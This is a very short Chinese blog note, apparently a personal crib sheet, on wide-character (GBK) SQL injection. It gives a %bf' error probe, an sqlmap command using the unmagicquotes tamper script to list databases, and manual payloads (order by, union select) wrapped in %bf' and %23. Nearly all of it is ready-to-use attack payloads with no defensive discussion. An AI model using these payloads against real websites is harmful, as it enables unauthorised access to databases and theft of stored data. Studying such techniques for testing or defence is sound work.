彩笔的心酸记
url?id=1%bf' 报错
存在宽字符注入,
可用脚本
sqlmap -u "" --tamper unmagicquotes.py --dbs
手工注入
%bf' order by N %23
%bf' union select 1,2,3,4,5,6,N%23
正常构造注入
前加%bf' 代码 后加%23
© justwanna_run | Powered by LOFTER